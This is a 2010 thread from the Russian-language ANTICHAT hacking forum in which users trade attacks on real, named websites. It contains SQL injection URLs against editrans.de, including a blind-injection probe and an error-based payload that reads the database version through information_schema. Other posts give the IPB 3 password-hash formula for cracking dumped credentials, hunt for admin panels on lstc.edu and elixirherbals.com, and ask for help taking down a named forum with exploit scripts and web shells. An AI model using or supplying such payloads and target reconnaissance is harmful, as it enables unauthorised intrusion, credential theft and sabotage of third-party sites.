ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

22.06.2010, 21:11
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
Двойной запрос.
Крути как слепую.
|
|
|

22.06.2010, 21:14
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
http://www.editrans.de/?view=article&id=6+and+substring(version(),1,1)=5
а вот так не прокатило
http://www.editrans.de/?view=article&id=-6+or(1,1)=(select+count(0),concat((select+version( )+from+information_schema.tables+limit+0,1),floor( rand(0)*2))from(information_schema.tables)group+by +2)--+
|
|
|

22.06.2010, 22:03
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
Код:
Code:
http://www.editrans.de/?view=article&id=6+and+substring(version(),1,1)=5
Вот так и крути.
Оффтоп: цитировать предыдущее сообщение не нужно
|
|
|

23.06.2010, 04:22
|
|
Познающий
Регистрация: 04.11.2007
Сообщений: 51
Провел на форуме: 310791
Репутация:
6
|
|
Где IPB 3+ хранит соль?
И какой алгаритм шифровки искользуется?
Везде написано что в members_pass_salt ,но чет не видать( может быть что без соли ?
Columns: Table ibf_members
name
mgroup
email
joined
ip_address
posts
title
allow_admin_mails
time_offset
hide_email
email_pm
email_full
skin
warn_level
warn_lastwarn
language
last_post
restrict_post
view_sigs
view_img
view_avs
view_pop
bday_day
bday_month
bday_year
new_msg
msg_total
show_popup
misc
last_visit
last_activity
dst_in_use
view_prefs
coppa_user
mod_posts
auto_track
orig_name
lastnamechange
namehistory
org_perm_id
temp_ban
sub_end
login_anonymous
ignored_users
mgroup_others
member_login_key
member_login_key_expire
subs_pkg_chosen
has_blog
members_auto_dst
members_cache
members_disable_pm
members_display_name
members_created_remote
members_editor_choice
members_markers
members_profile_views
members_l_display_name
members_l_username
failed_logins
failed_login_count
has_gallery
gallery_perms
t23_pcr_time
ip_geo
|
|
|

23.06.2010, 09:33
|
|
Участник форума
Регистрация: 15.05.2009
Сообщений: 111
Провел на форуме: 1179199
Репутация:
127
|
|
http://www.elixirherbals.com
|
|
|

23.06.2010, 11:35
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
Сообщение от InfectedM
InfectedM said:
Где IPB 3+ хранит соль?
И какой алгаритм шифровки искользуется?
Везде написано что в members_pass_salt ,но чет не видать( может быть что без соли ?
md5(md5($salt).md5($pass))
|
|
|

23.06.2010, 12:38
|
|
Новичок
Регистрация: 26.04.2010
Сообщений: 26
Провел на форуме: 136979
Репутация:
53
|
|
http://www.lstc.edu
Буду безумно благодарен, если кто поможет найти админку
|
|
|

23.06.2010, 14:10
|
|
Новичок
Регистрация: 03.01.2009
Сообщений: 27
Провел на форуме: 367442
Репутация:
41
|
|
Вот это нашел только, хз то или нет)
2 Dare
http://www.lstc.edu/intranet/
2 Bramin
http://www.elixirherbals.com:2082/
|
|
|

23.06.2010, 14:11
|
|
Новичок
Регистрация: 09.01.2009
Сообщений: 21
Провел на форуме: 195619
Репутация:
10
|
|
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//lstcnet.lstc.edu/ics[/COLOR][/COLOR]
Вот это не подойдет?
А вообще ты глянь из какой ты базы данных хочешь пароли-явки взять.
|
|
|

23.06.2010, 15:11
|
|
Guest
Сообщений: n/a
Провел на форуме: 584
Репутация:
0
|
|
Парни, всем привет. В общем не мое это дело, ломать форумы, я обычный программист, но стала такая ситуация очень нужной, а разобраться до самого последнего конца не могу.
Есть форум: _forum.help-animal. org.ua
Настоящая организация уже давно уехала с форума, делает себе новый сайт, а владелец этого форума еще пишет от ихнего имени.
Цель: Сделать сайт недоступным для общества.
Я так понял, форум вообще не защищен, так как устанавливали люди, которые в этом деле не совсем разбираются.
Я понимаю, что никто на блюдечке мне не принесет пароль администратора, по этому прошу хотя-бы подсказать путь, в каком направлении мне двигаться.
Буду раз за помощь.
В данной ситуации я смог только увидеть chenlog.html, установить Perl и начать запускать готовые pl скрипты, но дальше тупик. Понять суть заливания шелов тоже не могу, подмена печенек в этой версии форума, как я понял невозможна, за sql "прививки" вообще молчу . Так-что я продвинулся не так далеко, как бы хотел.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|